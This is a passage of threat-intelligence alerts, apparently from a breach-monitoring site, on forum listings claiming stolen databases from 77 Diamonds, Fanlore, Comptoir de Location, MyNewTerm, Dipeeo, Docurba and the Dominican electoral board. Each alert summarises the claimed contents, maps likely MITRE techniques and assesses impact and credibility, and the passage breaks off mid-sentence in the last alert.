feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=journaux-fr-2026-08-27&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=journaux-fr-2026-08-27&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=journaux-fr-2026-08-27&utm%5Fcontent=footer) // Threat Intelligence ### 77 Diamonds Customer File Offered With Home Addresses and Appointment Budgets URL: https://darkwebinformer.com/77-diamonds-customer-file-offered-with-home-addresses-and-appointment-budgets/ Last updated: 2026-08-26T18:27:56.000Z Breach Report United Kingdom Luxury Retail Price By Offer ## 77 Diamonds Customer File Offered With Home Addresses and Appointment Budgets A forum actor posting as **Jurak** is selling what they describe as the customer database of **77 Diamonds**, a London jeweller selling bespoke engagement and wedding jewellery through its website and showrooms in Mayfair, Manchester and Glasgow. The post claims roughly **690,000 unique email addresses, 461,000 surnames, 409,000 street addresses and 291,000 telephone numbers**, alongside **wedding dates, dates of birth and marketing preferences**. Beyond the customer table, the file list includes **showroom appointment records with stated budgets and notes, administrator roles and permissions, admin login attempts with IP addresses, and payment gateway webhook events**. No price is given. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Unique emails690,000 Street addresses409,000 Phone numbers291,000 ActorJurak ### ▣Post details Target77 Diamonds CountryUnited Kingdom SectorLuxury jewellery ListingSelling, price by offer VolumeAbout 690,000 emails Stated sourceNot described ObservedAug 26, 2026 ActorJurak ### !What the post claims - About 690,000 unique emails - About 461,000 surnames - About 409,000 street addresses - About 291,000 phone numbers - Titles and gender - Wedding dates - Dates of birth - Marketing opt in and opt out - Account creation dates - Password column present - Showroom appointment records - Stated appointment budgets - Appointment notes - Cancellation reasons - Administrator roles - Permission assignments - Admin login attempts - IP addresses and user agents - Payment gateway webhook events ### ◱Screenshots [ ![Forum listing selling an alleged 77 Diamonds customer database of around 690,000 records, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/5237894529873569287365987235987623432.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/5237894529873569287365987235987623432.png) [ ![Second section of the same listing showing the wider table list including admin and booking tables, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/5237894529873569287365987235987623433.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/5237894529873569287365987235987623433.png) Forum post offering the 77 Diamonds database for sale, observed 26 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred The table list spans customer, booking, administrative and payment integration areas of one application, which indicates database level access rather than an export from a single interface. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples are posted inline and the sale is arranged by direct contact. The route out of the environment is not described. ### ⚠Potential impact A jeweller's customer file is not an ordinary retail list. It is **a wealth ranked set of names attached to home addresses**, and this one comes with the ranking already done: the booking tables record **what each customer told the showroom they intended to spend**. Combine a stated budget with a delivery address and a phone number and the physical risk is obvious, both to households holding high value items and to the showrooms themselves. **Wedding dates make it worse, not better**, because they tell an attacker when a purchase is likely to be collected, delivered or worn, and they support extremely convincing social engineering. A message quoting the correct ring, the correct appointment and the correct date sits far outside what most people are prepared to doubt. Two further items need checking against the files. The **administrator tables with roles, permissions and login attempt logs** would help anyone attempting to get back into the environment, and the **payment gateway webhook payloads** should be examined for anything beyond tokens, since that is the only place in this set where card related data could plausibly sit. ### iStatus Unverified The sample is **detailed and awkward in the ways real data is awkward**, with partially completed rows, a mixture of consumer mail providers across several countries, junk test entries and gaps where fields were never filled. The actor also gives **separate counts for each field rather than one headline number**, which is the behaviour of someone who has actually loaded the file. Most striking is the recency: **creation dates in the sample fall within days of the post**, which if genuine means the export was taken very recently rather than being an old set repackaged. Against that, **no intrusion method, date or access route is described**, no price is stated, and the password column, though present, is empty in every visible row, so its storage format cannot be judged. The account is **established, with a long history and high standing**. Dark Web Informer has **not retrieved the data and is not linking it**, nor the contact address. 77 Diamonds has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=77-diamonds-2026-08-26&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=77-diamonds-2026-08-26&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=77-diamonds-2026-08-26&utm%5Fcontent=footer) // Threat Intelligence ### Fanlore Wiki Accounts Circulating After OTW's Self Reported Breach URL: https://darkwebinformer.com/fanlore-wiki-accounts-circulating-after-otws-self-reported-breach/ Last updated: 2026-08-26T18:11:06.000Z Breach Report United States Non Profit Wiki Shared Free ## Fanlore Wiki Accounts Circulating After OTW's Self Reported Breach A forum actor posting as **584** has published what they describe as the account database of **Fanlore.org**, the fan culture wiki operated by the **Organization for Transformative Works**, the non profit behind Archive of Our Own. The post states that OTW identified unauthorised access in **August 2026**, that around **145,000 unique email addresses** were exposed along with names, usernames and passwords stored as **MD5 or PBKDF2 hashes**, and that **OTW self reported the incident and submitted the data to Have I Been Pwned**. The published sample matches the standard MediaWiki user table, including verification and authentication tokens. The files are unlocked for a forum fee. The underlying incident is **acknowledged by the organisation**; this copy is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Unique emails145,000 HashesMD5, PBKDF2 IncidentSelf reported Actor584 ### ▣Post details TargetFanlore.org OperatorOrganization for Transformative Works CountryUnited States SectorNon profit wiki ListingForum points to unlock VolumeAbout 145,000 emails ObservedAug 26, 2026 Actor584 ### !What the post claims - About 145,000 unique emails - Account usernames - Real name field - Email addresses - Password hashes - MD5 hashes present - PBKDF2 hashes present - Reset password field - Email verification tokens - Authentication tokens - Registration timestamps - Last activity timestamps - Edit counts - Email verified flags - Temporary account flags - Unauthorised access in August 2026 - Incident self reported by OTW - Data submitted to Have I Been Pwned ### ◱Screenshot [ ![Forum post publishing an account database attributed to the Fanlore wiki, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697826357869235697828397659876235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697826357869235697828397659876235.png) Forum post publishing Fanlore account data, observed 26 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred The sample is the complete user table of the wiki software, including token and flag columns that no public interface exposes. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through forum hosting behind a points wall. The route out of the environment is not described. ### ⚠Potential impact The password hashes are the least of this. A mix of **MD5 and PBKDF2 suggests a long lived site where older accounts were never rehashed**, so a subset is crackable and worth rotating anywhere the same password was reused, but PBKDF2 will hold for most. The **real harm is deanonymisation**. Fan communities are heavily pseudonymous, and for many contributors that is a safety measure rather than a preference: people write and catalogue under handles precisely because their fandom activity, and often their sexuality or identity, is not something they want attached to their name at work or at home. This file **joins a wiki username to a working email address**, and since handles are commonly reused across archives, forums and messaging platforms, one linkage frequently unlocks several. Some records also carry a **real name field**. For a population that has historically been targeted for harassment campaigns, that is the meaningful exposure, not the credentials. The **authentication tokens** in the table are worth a separate look, since they matter considerably more if any remain valid. ### iStatus Acknowledged This one sits differently to most listings. The **underlying incident is not in dispute**, since the organisation identified it, disclosed it and submitted the exposed data to a breach notification service, which is a considerably better response than the silence that follows most of the posts covered here. What remains unverified is whether **this particular copy is genuine and complete**, and the actor supplies no method, no date beyond the month, and no account of how they came to hold it. The sample is **consistent with the wiki software's own schema**, which is a point in its favour, though that schema is public and its column names are documented, so structure alone proves less than it would elsewhere. The practical position for affected people is unchanged either way: anyone who registered on the wiki should **assume their email and username are now linked in public**, and rotate that password anywhere it was reused. Dark Web Informer has **not retrieved the files and is not linking them**. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fanlore-2026-08-26&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fanlore-2026-08-26&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fanlore-2026-08-26&utm%5Fcontent=footer) // Threat Intelligence ### Comptoir de Location Data Published as the Fourteenth Leak From One Platform URL: https://darkwebinformer.com/comptoir-de-location-data-published-as-the-fourteenth-leak-from-one-platform/ Last updated: 2026-08-26T17:35:03.000Z Breach Report France Equipment Rental Published Free ## Comptoir de Location Data Published as the Fourteenth Leak From One Platform A forum actor posting as **NikolaT** has published what they describe as the database of **Comptoir de Location**, a French company renting equipment to the construction, public works, materials handling and industrial sectors, giving a size of **13.48 GB across 323,388 files**. This is the **fourteenth entry in a running series drawn from a shared platform the actor calls BlgCloud**, and it lands on **exactly the target named in advance two days ago**. Samples again cover three layers: **CRM records with company details and credit terms, document metadata for invoices, work orders and conformity certificates, and staff user accounts**. A fifteenth target has been named. The data is **not for sale**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Size13.48 GB Files323,388 SeriesLeak 14 ActorNikolaT ### ▣Post details TargetComptoir de Location CountryFrance SectorEquipment rental ListingFree, reply to unlock Volume13.48 GB, 323,388 files Stated sourceShared platform ObservedAug 26, 2026 ActorNikolaT ### !What the post claims - 13.48 GB of data - 323,388 files - Fourteenth in the series - Fifteenth target announced - CRM company records - Registered addresses - Company and VAT numbers - Site coordinates - Bank account fields - Payment terms and limits - Solvency and tariff codes - Invoices and work orders - Conformity certificates - Stored file hashes and paths - Staff user accounts - Corporate email addresses - Access and reset timestamps - Password fields empty in sample ### ◱Screenshots [ ![Forum post publishing data attributed to Comptoir de Location as the fourteenth in a series of platform leaks, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/79826359782635978623598762398572987635987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/79826359782635978623598762398572987635987.png) [ ![Second section of the same post covering document metadata and user accounts, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/79826359782635978623598762398572987635988.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/79826359782635978623598762398572987635988.png) Forum post publishing Comptoir de Location data, observed 26 August 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1199](https://attack.mitre.org/techniques/T1199/) Trusted relationship Stated The data is attributed to a shared platform serving many companies. The samples contain the platform vendor's own administrative and support records sitting inside the customer's data, which is consistent with a multi tenant system. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated CRM objects, document records and user tables are exported together from one application, in the same shape as the previous entry in the series. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred Document entries carry storage paths and file hashes, and 323,388 files far exceeds what a database export alone would produce. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution is through forum hosted links. The route out of the environment is not described. ### ⚠Potential impact As with the previous entry, the exposure runs **outward from the named company into its trading network**. The CRM layer here is richer than usual because equipment rental is a credit business: alongside addresses and company numbers sit **payment terms, outstanding balance limits, solvency classifications and tariff codes** for named customer firms. That is **commercially sensitive information about third parties** who never dealt with the platform themselves, useful to a competitor and useful to anyone assessing which contractors are financially stretched. The document layer supplies the raw material for invoice fraud, with real work orders, invoices and conformity certificates to quote from, and construction sector payment chains are already a favourite target for that. The most important point remains the series. The actor **named this company as the next target two days ago and has now delivered it**, which moves the shared platform claim from assertion toward pattern. Every other client of that platform should be treating this as a live matter, and the company named for the fifteenth release has **a short and quantifiable amount of warning**. ### iStatus Unverified The single most significant development here is that **a prediction was made and then met**. Leak thirteen named this company as the next target, and leak fourteen is that company, on schedule and in the same format. That does not prove the platform account is correct, but it does demonstrate **knowledge of which companies are reachable before they are published**, which is difficult to explain if the data were assembled from unrelated sources. The samples support the same reading, since **the platform vendor's own support and administrative entries appear inside this customer's records**, exactly as they would in a multi tenant system. Still absent is any account of **how the access was obtained**, and the platform itself has no obvious public footprint under the name used. Distribution is free, so there is no price to defend, though a numbered series builds standing. Dark Web Informer has **not retrieved the files and is not linking them**. Neither the company nor any platform provider has publicly addressed the series. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=comptoir-de-location-2026-08-26&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=comptoir-de-location-2026-08-26&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=comptoir-de-location-2026-08-26&utm%5Fcontent=footer) // Threat Intelligence ### MyNewTerm Applicant Data on 142,653 Users Offered as a One Time Sale URL: https://darkwebinformer.com/mynewterm-applicant-data-on-142-653-users-offered-as-a-one-time-sale/ Last updated: 2026-08-25T18:29:55.000Z Breach Report United Kingdom Education Recruitment One Time Sale ## MyNewTerm Applicant Data on 142,653 Users Offered as a One Time Sale A forum actor posting as **888** is selling what they describe as the database of **MyNewTerm**, a recruitment platform built for the education sector that handles the hiring cycle for schools and trusts from job advert through interview scheduling, references and onboarding. The post claims a breach in **August 2026 exposing 142,653 unique users** and attributes it to the poster directly. Samples show two layers: **vacancy listings** with school names, salary ranges and locations, and an **applications layer carrying candidate email addresses, the role applied for, application status, start dates and free text recruiter notes**. The sale is offered **once, in Monero**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Unique users142,653 SaleOne time PaymentMonero Actor888 ### ▣Post details TargetMyNewTerm CountryUnited Kingdom SectorEducation recruitment ListingOne time sale, Monero Volume142,653 unique users Stated sourceDirect breach claimed ObservedAug 25, 2026 Actor888 ### !What the post claims - 142,653 unique users - Breach dated August 2026 - Candidate email addresses - Role applied for - Application status - Offer and hire outcomes - Rescinded or withdrawn flags - Job reference numbers - Job start dates - Onboarding owner - Free text recruiter notes - How each applicant heard of the role - Trust and establishment IDs - Vacancy listings - School names and towns - Salary ranges - Visa sponsorship flags - Post codes and coordinates ### ◱Screenshots [ ![Forum listing selling an alleged MyNewTerm database of 142,653 users, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/97283569876235978629387659876235987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/97283569876235978629387659876235987.png) [ ![Second section of the same listing showing vacancy fields and sale terms, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/97283569876235978629387659876235988.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/97283569876235978629387659876235988.png) Forum post offering the MyNewTerm database for sale, observed 25 August 2026. ### ☷Mapped techniques The post asserts a breach but describes no method. Both entries are inferred from the artefacts. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Two joined layers exported together with internal identifiers, version columns and soft delete flags indicate a database export rather than scraping of the public job board. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples are posted inline and the sale is arranged through forum and messenger contact. The route out of the environment is not described. ### ⚠Potential impact The two layers are worth very different amounts. **Vacancy listings are already public**, since school job adverts are published by design, so that half adds little beyond convenience. The **applications layer is the problem**. It records who applied for which role at which school, what happened to that application, and in many cases a **free text note written by the recruiter**, including remarks about conversations and personal connections to the school. Job applications are made in confidence and usually by people already employed somewhere else, so the exposure here is not only an email address, it is **the fact of having applied, and of having been rejected, withdrawn or had an offer rescinded**. The population is also a specific one. These are teaching assistants, cleaners, lunchtime supervisors, invigilators and cover staff, often low paid and often new to a school's systems, which makes them **unusually good targets for onboarding themed fraud**. An approach quoting a genuine job reference, the correct school and a real start date, asking for identity documents or background check payment, would be very difficult for a recent applicant to distinguish from the real process. ### iStatus Unverified The samples are **substantial and internally coherent**, running across two related tables with consistent identifiers, plausible reference formats for the sector, and the kind of untidy free text that real recruitment records accumulate and fabricated ones rarely do. The account is also **unusually established**, holding moderator status with a long history and high standing on the forum, which within that setting is a reputational stake worth something. None of that establishes how the data was obtained, and **no method, access route or timeline is described beyond a month**. Because part of the set is public job advert data, **a sample check on the vacancy layer proves nothing**; only the applications layer is diagnostic. Dark Web Informer has **not retrieved the data and is not linking it**, nor the contact address. MyNewTerm has not publicly addressed the claim. Any school or trust using the platform would have its own notification position to consider, since the applicant records belong to their processes. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=mynewterm-2026-08-25&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=mynewterm-2026-08-25&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=mynewterm-2026-08-25&utm%5Fcontent=footer) // Threat Intelligence ### A French GDPR Compliance Provider's Client Records Shared on a Forum URL: https://darkwebinformer.com/a-french-gdpr-compliance-providers-client-records-shared-on-a-forum/ Last updated: 2026-08-25T17:59:34.000Z Breach Report France GDPR Compliance Shared Free ## A French GDPR Compliance Provider's Client Records Shared on a Forum A forum user posting as **0xSec** has published what they describe as the database of **metabase.dipeeo.fr**. Dipeeo is a French company that supplies **outsourced Data Protection Officers and compliance software** to organisations subject to the GDPR. The release is **eleven JSON collections** covering client company accounts, named legal officers, user accounts with roles and a password field, **subcontractor registers with audit status**, data processing analyses, and trust centre client lists and visitor requests. **No record counts are given and no data sample is published**, only the field structure of each collection. The files are unlocked for a nominal forum fee. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) CollectionsEleven FormatJSON RecordsNot stated Actor0xSec ### ▣Post details Targetmetabase.dipeeo.fr CountryFrance SectorCompliance services ListingNominal forum fee VolumeNot stated FormatJSON, eleven files ObservedAug 25, 2026 Actor0xSec ### !What the post claims - Eleven JSON collections - No record counts given - No data sample published - Client company accounts - Named legal officers - Legal officer emails - Commercial contacts - Employee counts - Drive and calendar links - Accounting platform references - User accounts and roles - Password field present - Phone numbers and last login - Subcontractor registers - Subcontractor contacts - Audit status and history - Data processing analyses - Trust centre visitor requests ### ◱Screenshots [ ![Forum post publishing collections attributed to the French GDPR compliance provider Dipeeo, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/92378578623598762369568791876598713.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/92378578623598762369568791876598713.png) [ ![Second section of the same post listing further collections including subcontractors and users, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/92378578623598762369568791876598714.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/92378578623598762369568791876598714.png) Forum post publishing Dipeeo data, observed 25 August 2026. ### ☷Mapped techniques The post describes no intrusion method. All entries are inferred from the artefacts, not stated. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Inferred The named host is a business intelligence front end rather than the product itself. Self hosted instances of that software have carried pre authentication flaws, which makes an internet reachable analytics tool a plausible route. This is inference from the hostname alone. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Eleven collections exported together, including migration and audit logs, indicates whole database access rather than a targeted query. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through forum hosting behind a points wall. The route out of the environment is not described. ### ⚠Potential impact The obvious point is that a company selling GDPR compliance has been named in a data leak. The more useful point is **what a compliance provider's database actually contains**, which is not really its own data but a **structured record of its clients' weaknesses**. Subcontractor registers list which vendors each client organisation uses and which of those relationships were audited, rejected, or left unresolved. Processing analyses record what was assessed and what failed. Read across all clients, that is **a map of where personal data sits in dozens of organisations and which of those handovers nobody has checked**, which is exactly the reconnaissance an attacker would otherwise spend months building. The account records name the **legal officer for each client with their direct email**, and a message from a company's own DPO asking for records is close to the most credible pretext available in a European organisation. Two further items deserve checking against the files themselves: the **password field in the user collection**, whose storage format is not shown, and the **links to external drive, calendar and accounting platforms**, which matter a great deal more if any credential or token accompanies them. ### iStatus Unverified This post is **weaker on evidence than the same actor's earlier one today**. There are no record counts, no file sizes and, most importantly, **no sample rows at all**, only field names. Field structure is genuinely hard to invent convincingly, and the naming here is coherent across eleven collections in a way that suggests a real document database was examined, but structure alone shows a schema was seen rather than that any data was taken. **No intrusion method, date or access route is given.** The account is **established, with a long history and a paid rank**, and this is its **second French target published within an hour**, which suggests either a productive run or a backlog being released. Dark Web Informer has **not retrieved the files and is not linking them**. Dipeeo has not publicly addressed the claim. Given the nature of the business, any client organisation named in these files would have its own notification obligations to consider. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=dipeeo-2026-08-25&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=dipeeo-2026-08-25&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=dipeeo-2026-08-25&utm%5Fcontent=footer) // Threat Intelligence ### Docurba User Tables Shared, Exposing French Planning Officials and Admin Flags URL: https://darkwebinformer.com/docurba-user-tables-shared-exposing-french-planning-officials-and-admin-flags/ Last updated: 2026-08-25T16:57:43.000Z Breach Report France Government Platform Shared Free ## Docurba User Tables Shared, Exposing French Planning Officials and Admin Flags A forum user posting as **0xSec** has published what they describe as the user tables of **docurba.beta.gouv.fr**, a French state platform used by local authorities, consulting firms and government services to develop urban planning documents such as PLUs and SCoTs. The release is **three spreadsheets totalling 5,152 rows**, covering names, work email addresses, telephone numbers, job titles and the authority each person belongs to, together with **administrator and staff flags, verification status and login state**. The actor states they **could have taken the rest of the data but chose not to**, describing it as worthless. The files are unlocked for a nominal forum fee. The claim is **unverified**. Severity MODERATE [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Rows5,152 FilesThree Further accessClaimed Actor0xSec ### ▣Post details Targetdocurba.beta.gouv.fr CountryFrance SectorGovernment platform ListingNominal forum fee Volume5,152 rows FormatXLSX, three files ObservedAug 25, 2026 Actor0xSec ### !What the post claims - 5,152 rows in three files - XLSX format - First and last names - Work email addresses - Telephone numbers - Job titles - Secondary job titles - Department and region - Authority identifiers - SIREN numbers - INSEE codes - Administrator flags - Staff flags - Verification status - First login indicator - Marketing opt in status - CRM sync field - Wider access claimed ### ◱Screenshot [ ![Forum post publishing user tables attributed to the French government platform docurba.beta.gouv.fr, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/923957623976597823567982359876239587429783.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/923957623976597823567982359876239587429783.png) Forum post publishing Docurba user tables, observed 25 August 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated The actor says they selected the user tables and left the rest, which implies query level access rather than a single dump taken blind. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution is through forum hosting behind a points wall. The route out of the environment is not described. ### ⚠Potential impact Five thousand rows with no passwords looks minor, and as a privacy incident it largely is. As a **targeting list it is considerably more useful than its size suggests**. Every row names a working official, gives their job title, their direct line, their work address and the authority they sit in, and the export helpfully marks **which of them hold administrator or staff privileges** on a government platform. That is the shortlist a phishing operation would otherwise have to assemble by hand, and it arrives pre sorted by seniority and by region. The context raises the value further, because **PLUs and SCoTs govern what can be built where**, decisions with direct financial consequences for developers and landowners, so the people in this file are worth impersonating as well as worth compromising. The line that deserves the most attention is the actor's own: they say the remaining data was left behind by choice. If that is true, **the access was broader than what has been published**, and the planning documents themselves remain within reach. ### iStatus Unverified The column lists are the most persuasive element. They include **internal relational naming across three joined tables** and operational fields such as verification state, first login and a CRM sync marker, which is the kind of detail that comes from looking at a real schema rather than from imagining one. Set against that, **no intrusion method, date or access route is given**, and the claim of wider access is **both unverifiable and self serving**, since dismissing the unpublished data as worthless conveniently explains why none of it was shown. The account is **established, with a long history and a paid rank**. The nominal points fee is a distribution mechanic rather than a price, and does not indicate the data is being sold. Dark Web Informer has **not retrieved the files and is not linking them**. Neither the platform team nor any French authority has publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=docurba-2026-08-25&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=docurba-2026-08-25&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=docurba-2026-08-25&utm%5Fcontent=footer) // Threat Intelligence ### JCE Records on 7.1 Million Dominicans Advertised With 5.76 Million ID Photographs URL: https://darkwebinformer.com/jce-records-on-7-1-million-dominicans-advertised-with-5-76-million-id-photographs/ Last updated: 2026-08-25T16:07:38.000Z Breach Report Dominican Republic Government No Price Stated ## JCE Records on 7.1 Million Dominicans Advertised With 5.76 Million ID Photographs A forum user posting as **GordonFreeman** claims to have breached the **Junta Central Electoral**, the Dominican Republic's central electoral board, and is publishing what they describe as **7,141,313 citizen records alongside 5,758,124 identity card photographs** keyed to the cédula number of each person. The stated fields include **cédula, given names and surnames, civil status, date of birth, sex, place of birth, blood type and occupation**. The citizen data is given as **573 MB in .DB format and the images as 19.4 